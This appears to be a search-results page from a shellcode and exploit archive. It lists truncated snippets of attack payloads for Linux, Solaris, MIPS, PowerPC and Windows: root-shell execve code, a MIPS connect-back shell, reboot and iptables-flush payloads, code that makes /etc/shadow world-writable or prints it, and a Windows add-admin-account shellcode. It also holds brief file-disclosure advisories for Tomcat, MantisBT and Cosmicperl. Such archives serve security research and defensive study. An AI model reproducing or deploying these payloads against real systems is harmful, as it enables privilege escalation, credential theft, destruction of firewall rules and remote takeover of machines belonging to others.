3386 matches found
linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes
No description provided by source. / Linux/x86 setuid0 + setgid0 + execve/bin/sh, /bin/sh, NULL - 37 bytes - [email protected] / char shellcode = \x6a\x17 // push $0x17 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \xcd\x80 // int $0x80 \x6a\x2e // push $0x2e \x58 // pop %eax \x53 // push %ebx...
linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes
No description provided by source. / Linux/x86 setreuid0,0 + execve/bin/sh, /bin/sh, NULL - 33 bytes - [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \x31\xc9 // xor %ecx, %ecx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // pus...
Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
No description provided by source. / Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include stdio.h char sc = \x24\x0f\xff\xfd // li t7,-3 \x01\xe0\x20\x27 // nor a0,t7,zero \x01\xe0\x28\x27 // nor a1,t7,zero \x28\x06\xff\xff // sl...
Linux/MIPS - reboot() - 32 bytes.
No description provided by source. / Title: Linux/MIPS - reboot - 32 bytes. Author: rigan - imrigan sobachka gmail.com / include stdio.h char sc = \x3c\x06\x43\x21 // lui a2,0x4321 \x34\xc6\xfe\xdc // ori a2,a2,0xfedc \x3c\x05\x28\x12 // lui a1,0x2812 \x34\xa5\x19\x69 // ori a1,a1,0x1969...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
No description provided by source. / linux/x86 setreuid0, 0 + execve/bin/sh, /bin/sh, NULL, NULL - 31 bytes - izik [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx,%ebx \x31\xc9 // xor %ecx,%ecx \xcd\x80 // int $0x80 \x99 // cltd \xb0\x0b // mov...
linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes
No description provided by source. / linux/x86 quick yet conditional, eax != 0 and edx == 0 exit - 4 bytes - izik [email protected] / char shellcode = \xf7\xf0 // div %eax \xcd\x80; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; // milw0rm.com 2006-01-21...
linux/x86 write(0,"Hello core!\n",12); (with optional 7 byte exit) 36 bytes
No description provided by source. / writehello-core.c by Charles Stevenson [email protected] I made this as a chunk you can paste in to make modular remote exploits. I use it to see if my dup2loop worked. If you don't get Hello core!\n back it's a good indicator your shell won't be functional the...
Linux/x86-64 - execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL) - 49 bytes
No description provided by source. / Title: Linux/x86-64 - execve/sbin/iptables, /sbin/iptables, -F, NULL - 49 bytes Author: 10n1z3d 10n1z3datwdotcn Date: Fri 09 Jul 2010 03:26:12 PM EEST Source Code NASM: section .text global start start: xor rax, rax push rax push word 0x462d mov rcx, rsp mov...
linux chroot()/execve() code
No description provided by source. / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered user : 181116 preedatoratsendmaildotru / char...
linux/x86 execve /bin/sh toupper() evasion 55 bytes
No description provided by source. / Linux/x86 toupper evasion, standard execve /bin/sh used eg. in various imapd exploits. Goes through a loop adding 0x20 to the /bin/sh -= 0x20 string ie. yields /bin/sh after addition. / include stdio.h char c0de = / main: / \xeb\x29 / jmp callz / / start: / \x...
os-x/ppc sync(), reboot() 32 bytes
No description provided by source. / MacOSX/PowerPC Shellcode for: sync, reboot 32 bytes hophet at gmail.com http://www.nlabs.com.br/hophet/ / include stdio.h include string.h char shellcode = \x7c\x63\x1a\x79 \x39\x40\x01\x06 \x38\x0a\xff\x1e \x44\xff\xff\x02 \x60\x60\x60\x60 \x39\x40\x01\x19...
Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6721/info Apache Tomcat is prone to a directory/file disclosure vulnerability when used with JDK 1.3.1 or earlier. It has been reported that remote attackers may view directory contents even when an 'index.html' or other...
MantisBT <= 1.2.3 (db_type) - Local File Inclusion Vulnerability
No description provided by source. MantisBT =1.2.3 dbtype Local File Inclusion Vulnerability Vendor: MantisBT Group Product web page: http://www.mantisbt.org Version affected: 1.2.4 Summary: MantisBT is a free popular web-based bugtracking system. It is written in the PHP scripting language and...
Cosmicperl Directory Pro 2.0 Arbitrary File Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2793/info Webdirectory Pro is a web application used to create a searchable directory of links developed by Cosmicperl. Webdirectory Pro contains an input validation vulnerability which may lead to disclosure of sensitive...
solaris/x86 setuid(0), execve(//bin/sh); exit(0) NULL Free 39 bytes
No description provided by source. / ; sm4x 2008 ; setuid0, execve'/bin/sh', '/bin/sh', 0, ; 39 bytes NizzULL free you know... ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; quick port to drop root sh - ; - SunOS is pwnij global start start: xor eax, eax ; --- setuid0 push eax push eax mov a...
solaris/x86 setuid(0), execve(/bin/cat, /etc/shadow), exit(0) 59 bytes
No description provided by source. / ; sm4x 2008 ; /bin/cat /etc/shadow ; 59 bytes ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; port to SunOS to pwn a b0x - thank god for that default unix CRYPTDEFAULT!!!! ; this is what happens when ur work takes away root pirv on a SunOS box :-/ global...
win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes
No description provided by source. Title : win32/xp sp3 Tr Add Admin Account Shellcode 127 bytes Proof : http://img823.imageshack.us/img823/1017/addqx.jpg Desc. : usr: zrl , pass: 123456 , localgroup: Administrator Author : ZoRLu / http://inj3ct0r.com/author/577 mail-msn :...
Linux - chmod(/etc/shadow, 0666) & exit() - 33 bytes
No description provided by source. include stdio.h / linux/x86 ; chmod/etc/shadow, 0666 & exit 33 bytes written by ka0x - ka0x01alt+64gmail.com lun sep 21 17:13:25 CEST 2009 greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek and others! / int main char shellcode = \x31\xc0 /...
Linux x86 /bin/sh Null-Free Polymorphic Shellcode - 46 bytes
No description provided by source. include stdio.h include string.h / Aodrulez's /bin/sh Null-Free Polymorphic Shellcode. Shellcode size : 46 bytes. Special Tnx to 'Chema Garcia aka sch3m4' Tested on : Ubuntu 8.04,Hardy Heron. Email : f3arm3d3aratgmail.com Author: Aodrulez. Atul Alex Cherian Blog...
linux/x86 chmod 666 /etc/shadow 27 bytes
No description provided by source. ; linux/x86 chmod 666 /etc/shadow 27 bytes ; root@thegibson ; 2010-01-15 section .text global start start: ; chmod//etc/shadow, 0666; mov al, 15 cdq push edx push dword 0x776f6461 push dword 0x68732f63 push dword 0x74652f2f mov ebx, esp mov cx, 0666o int 0x80...